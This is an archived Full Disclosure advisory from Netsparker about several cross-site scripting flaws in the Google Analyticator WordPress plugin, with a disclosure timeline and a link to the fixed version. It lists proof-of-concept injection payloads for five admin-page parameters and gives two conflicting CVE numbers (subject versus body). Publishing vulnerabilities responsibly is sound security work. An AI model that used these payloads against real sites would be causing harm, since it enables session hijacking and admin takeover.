lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAMDUZo6Ow2H7LztRqkKjdm8yeAvvikC5uCmsBKQ_iyVNkxMkcg@mail.gmail.com>
Date: Mon, 24 Aug 2015 14:45:36 +0300
From: Onur Yilmaz <onur@...sparker.com>
To: fulldisclosure@...lists.org, cert@...t.org, vuln@...unia.com, 
 bugs@...uritytracker.com, submissions@...ketstormsecurity.org, 
 bugtraq@...urityfocus.com
Subject: [FD] Google Analyticator Security Advisory - Multiple XSS
 Vulnerabilities - CVE-2015-6328

Information
--------------------
Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in Google Analyticator
Affected Software : Google Analyticator (WordPress Plugin)
Affected Versions: 6.4.9.4 and possibly below
Vendor Homepage : https://wordpress.org/plugins/google-analyticator/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-6238
Netsparker Advisory Reference : NS-15-013

Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in user’s session. This means that the malicious hacker can change
the logged in user’s password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrator’s session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details
--------------------
Proof of Concept URLs for XSS in Google Analyticator 6.4.9.4:

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_adsense
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_admin_disable_DimentionIndex
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_downloads_prefix
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_downloads
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_outbound_prefix
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline
--------------------
14/08/2015 - First Contact
24/08/2015 - Vendor Fixed
24/08/2015 - Advisory Released

Solution
--------------------
https://downloads.wordpress.org/plugin/google-analyticator.6.4.9.6.zip

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web
Application Security Scanner.

About Netsparker
--------------------
Netsparker finds and reports security issues and vulnerabilities such as
SQL Injection and Cross-site Scripting (XSS) in all websites and web
applications regardless of the platform and the technology they are built
on. Netsparker's unique detection and exploitation techniques allows it to
be dead accurate in reporting hence it's the first and the only False
Positive Free web application security scanner. For more information visit
our website on https://www.netsparker.com

-- 
Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner <https://www.netsparker.com>
T: +90 (0)554 873 0482

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ